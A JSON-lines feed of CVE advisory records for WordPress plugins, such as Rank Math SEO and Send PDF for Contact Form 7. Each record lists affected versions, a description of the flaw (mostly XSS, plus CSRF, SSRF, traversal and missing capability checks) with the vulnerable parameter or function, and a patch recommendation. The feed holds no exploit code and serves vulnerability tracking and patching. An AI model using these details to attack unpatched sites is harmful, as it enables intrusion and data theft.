{"CVE_ID":"CVE-2024-4617","slug":"seo-by-rank-math","versionImpact":"1.0.218","versionEndExcluding":"1.0.219-beta","description":"The Rank Math SEO with AI Best SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in versions up to, and including, 1.0.218 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.219-beta, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/474fdbcb-fe3c-4a79-a847-363f81b300c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/474fdbcb-fe3c-4a79-a847-363f81b300c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block-faq.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block-faq.php#L183\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084351\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084351\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4627","slug":"seo-by-rank-math","versionImpact":"1.0.218","versionEndExcluding":"1.0.219","description":"The Rank Math SEO WordPress plugin before 1.0.219 does not sanitise and escape some of its settings, which could allow users with access to the General Settings (by default admin, however such access can be given to lower roles via the Role Manager feature of the Rank Math SEO WordPress plugin before 1.0.219) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.0.219, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0058fcc-36f6-40bf-9848-fbe2d751d754\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0058fcc-36f6-40bf-9848-fbe2d751d754\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4335","slug":"seo-by-rank-math","versionImpact":"1.0.217","versionEndExcluding":"1.0.218","description":"The Rank Math SEO with AI Best SEO Tools plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018textAlign\u2019 parameter in versions up to, and including, 1.0.217 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.218, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080259\\\/#file26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080259\\\/#file26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/tags\\\/1.0.217\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/tags\\\/1.0.217\\\/includes\\\/modules\\\/schema\\\/blocks\\\/class-block.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96eba67c-58e7-4eea-84d4-9b3bb275b42d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96eba67c-58e7-4eea-84d4-9b3bb275b42d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23664","slug":" convertbox-auto-embed","versionEndExcluding":"1.0.20","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in ConvertBox ConvertBox Auto Embed WordPress plugin <=\u00a01.0.19 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/convertbox-auto-embed\\\/wordpress-convertbox-auto-embed-wordpress-plugin-plugin-1-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/convertbox-auto-embed\\\/wordpress-convertbox-auto-embed-wordpress-plugin-plugin-1-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3585","slug":"send-pdf-for-contact-form-7","versionImpact":"1.0.2.3","versionEndExcluding":"1.0.2.4","description":"The Send PDF for Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of form submissions due to a missing capability check on the hooks function in all versions up to, and including, 1.0.2.3. This makes it possible for unauthenticated attackers to download information about contact form entries with PDFs.","recommendation":"Update to version 1.0.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0646fcba-afe5-49a2-acd5-e15d009926c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0646fcba-afe5-49a2-acd5-e15d009926c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/send-pdf-for-contact-form-7\\\/trunk\\\/classes\\\/send-pdf.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/send-pdf-for-contact-form-7\\\/trunk\\\/classes\\\/send-pdf.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074631\\\/send-pdf-for-contact-form-7\\\/trunk?contextall=1&old=3069882&old_path=%2Fsend-pdf-for-contact-form-7%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074631\\\/send-pdf-for-contact-form-7\\\/trunk?contextall=1&old=3069882&old_path=%2Fsend-pdf-for-contact-form-7%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41731","slug":"publish-post-email-notification","versionImpact":"1.0.2.2","versionEndExcluding":"1.0.2.3","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution WordPress publish post email notification plugin <=\u00a01.0.2.2 versions.","recommendation":"Update to version 1.0.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/publish-post-email-notification\\\/wordpress-wordpress-publish-post-email-notification-plugin-1-0-2-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/publish-post-email-notification\\\/wordpress-wordpress-publish-post-email-notification-plugin-1-0-2-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1690","slug":"tmm_stripe_checkout","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"The ThemeMakers Stripe Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'stripe' shortcode in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_stripe_checkout\\\/compare\\\/v1.0.1...v1.0.2\",\"name\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_stripe_checkout\\\/compare\\\/v1.0.1...v1.0.2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd040ff7-7f30-4097-9492-743a9821589e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd040ff7-7f30-4097-9492-743a9821589e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12294","slug":"last-viewed-posts","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.1 via the 'get_legacy_cookies' function. This makes it possible for unauthenticated attackers to extract sensitive data including titles and permalinks of private, password-protected, pending, and draft posts.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/last-viewed-posts\\\/trunk\\\/inc\\\/namespace.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/last-viewed-posts\\\/trunk\\\/inc\\\/namespace.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205041\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205041\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db838a3f-6afa-4686-8e6a-01edab2dcc96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db838a3f-6afa-4686-8e6a-01edab2dcc96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10112","slug":"wooframework-branding","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"A vulnerability classified as problematic has been found in WooFramework Branding Plugin up to 1.0.1 on WordPress. Affected is the function admin_screen_logic of the file wooframework-branding.php. The manipulation of the argument url leads to open redirect. It is possible to launch the attack remotely. Upgrading to version 1.0.2 is able to address this issue. The name of the patch is f12fccd7b5eaf66442346f748c901ef504742f78. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230652.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-branding\\\/commit\\\/f12fccd7b5eaf66442346f748c901ef504742f78\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-branding\\\/commit\\\/f12fccd7b5eaf66442346f748c901ef504742f78\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230652\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230652\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230652\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230652\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10113","slug":"wooframework-tweaks","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"A vulnerability classified as problematic was found in WooFramework Tweaks Plugin up to 1.0.1 on WordPress. Affected by this vulnerability is the function admin_screen_logic of the file wooframework-tweaks.php. The manipulation of the argument url leads to open redirect. The attack can be launched remotely. Upgrading to version 1.0.2 is able to address this issue. The identifier of the patch is 3b57d405149c1a59d1119da6e0bb8212732c9c88. It is recommended to upgrade the affected component. The identifier VDB-230653 was assigned to this vulnerability.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-tweaks\\\/commit\\\/3b57d405149c1a59d1119da6e0bb8212732c9c88\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-tweaks\\\/commit\\\/3b57d405149c1a59d1119da6e0bb8212732c9c88\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230653\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230653\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230653\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230653\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12474","slug":"geodatasource-country-region-dropdown","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"The GeoDataSource Country Region DropDown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gds-country-dropdown' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207322%40geodatasource-country-region-dropdown&new=3207322%40geodatasource-country-region-dropdown&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207322%40geodatasource-country-region-dropdown&new=3207322%40geodatasource-country-region-dropdown&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c974726e-9371-40e5-8664-c12c8c06e5b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c974726e-9371-40e5-8664-c12c8c06e5b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4746","slug":"fluent-security","versionEndExcluding":"1.0.2","description":"The FluentAuth WordPress plugin before 1.0.2 prioritizes getting a visitor's IP address from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass the IP-based blocks set by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62e3babc-00c6-4a35-972f-8f03ba70ba32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62e3babc-00c6-4a35-972f-8f03ba70ba32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30616","slug":"form-block","versionEndExcluding":"1.0.2","description":"Form block is a wordpress plugin designed to make form creation easier. Versions prior to 1.0.2 are subject to a Cross-Site Request Forgery due to a missing nonce check. There is potential for a Cross Site Request Forgery for all form blocks, since it allows to send requests to the forms from any website without a user noticing. Users are advised to upgrade to version 1.0.2. There are no known workarounds for this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/security\\\/advisories\\\/GHSA-j4c2-7p87-q824\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/security\\\/advisories\\\/GHSA-j4c2-7p87-q824\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/commit\\\/cf0012fa0710d906c594346ba775c5dc433a9426\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/commit\\\/cf0012fa0710d906c594346ba775c5dc433a9426\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3632","slug":"photoshow","versionImpact":"1.0.18","versionEndExcluding":"1.0.19","description":"The Smart Image Gallery WordPress plugin before 1.0.19 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 1.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b11682d-4705-4595-943f-0fa093d0b644\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b11682d-4705-4595-943f-0fa093d0b644\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6985","slug":"ai-assistant-by-10web","versionImpact":"1.0.18","versionEndExcluding":"1.0.19","description":"The 10Web AI Assistant \u2013 AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.","recommendation":"Update to version 1.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229245a5-468d-47b9-8f26-d23d593e91da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229245a5-468d-47b9-8f26-d23d593e91da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027004\\\/ai-assistant-by-10web\\\/trunk\\\/ai-assistant-by-10web.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027004\\\/ai-assistant-by-10web\\\/trunk\\\/ai-assistant-by-10web.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4626","slug":"jetwidgets-for-elementor","versionImpact":"1.0.17","versionEndExcluding":"1.0.18","description":"The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018layout_type\u2019 and 'id' parameters in all versions up to, and including, 1.0.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4457d15e-2c01-498d-b94a-a6e93adcf70c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4457d15e-2c01-498d-b94a-a6e93adcf70c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-image-comparison.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-image-comparison.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-images-layout.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-images-layout.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12269","slug":"safe-ai-malware-protection-for-wp","versionImpact":"1.0.17","versionEndExcluding":"1.0.18","description":"The Safe Ai Malware Protection for WP plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db() function in all versions up to, and including, 1.0.17. This makes it possible for unauthenticated attackers to retrieve a complete dump of the site's database.","recommendation":"Update to version 1.0.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/safe-ai-malware-protection-for-wp\\\/trunk\\\/includes\\\/class-mvsp-export-db.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/safe-ai-malware-protection-for-wp\\\/trunk\\\/includes\\\/class-mvsp-export-db.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5247bf43-ae02-47cb-825e-23821b78eba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5247bf43-ae02-47cb-825e-23821b78eba9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3473","slug":"99robots-header-footer-code-manager-pro","versionImpact":"1.0.16","versionEndExcluding":"1.0.17","description":"The Header Footer Code Manager Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the message parameter in all versions up to, and including, 1.0.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a35d16-526d-4e45-b2cf-a6858b2b2f21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a35d16-526d-4e45-b2cf-a6858b2b2f21?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/app.loopedin.io\\\/header-footer-code-manager-pro#\\\/updates\",\"name\":\"https:\\\/\\\/app.loopedin.io\\\/header-footer-code-manager-pro#\\\/updates\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5902","slug":"userfeedback-lite","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name parameter in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in feedback form responses that will execute whenever a high-privileged user tries to view them.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bce9ba42-f574-47c1-9ea5-1e56f9da8e71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bce9ba42-f574-47c1-9ea5-1e56f9da8e71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userfeedback-lite\\\/tags\\\/1.0.15\\\/includes\\\/frontend\\\/class-userfeedback-frontend.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userfeedback-lite\\\/tags\\\/1.0.15\\\/includes\\\/frontend\\\/class-userfeedback-frontend.php#L257\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12237","slug":"wp-responsive-photo-gallery","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The Photo Gallery Slideshow & Masonry Tiled Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.15 via the rjg_get_youtube_info_justified_gallery_callback function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to retrieve limited information from internal services.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3023\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3044\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3044\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08e44434-8908-4c63-9e5b-9a8b387255d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08e44434-8908-4c63-9e5b-9a8b387255d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1259","slug":"hotjar","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The Hotjar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the hotjar_site_id in versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hotjar\\\/tags\\\/1.0.14\\\/includes\\\/class-hotjar.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hotjar\\\/tags\\\/1.0.14\\\/includes\\\/class-hotjar.php#L40\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c640bcb-b6bf-4865-b713-32ca846e4ed9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c640bcb-b6bf-4865-b713-32ca846e4ed9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7327","slug":"business-reviews-wp","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The Widget for Google Reviews plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.15 via the layout parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This is limited to just PHP files.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3316262%40business-reviews-wp%2Ftrunk&old=3201057%40business-reviews-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3316262%40business-reviews-wp%2Ftrunk&old=3201057%40business-reviews-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4681e56f-1dad-46a7-8ac7-1f543a383433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4681e56f-1dad-46a7-8ac7-1f543a383433?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13335","slug":"sastra-essential-addons-for-elementor","versionImpact":"1.0.14","versionEndExcluding":"1.0.15","description":"The Spexo Addons for Elementor \u2013 Free Elementor Addons, Widgets and Templates plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the tmpcoder_theme_install_func() function in all versions up to, and including, 1.0.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install a theme.","recommendation":"Update to version 1.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227353\\\/sastra-essential-addons-for-elementor\\\/trunk\\\/inc\\\/wizard\\\/wizard-ajax-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227353\\\/sastra-essential-addons-for-elementor\\\/trunk\\\/inc\\\/wizard\\\/wizard-ajax-api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4edc7ef9-33db-4433-8ef2-cd06089ee8d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4edc7ef9-33db-4433-8ef2-cd06089ee8d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
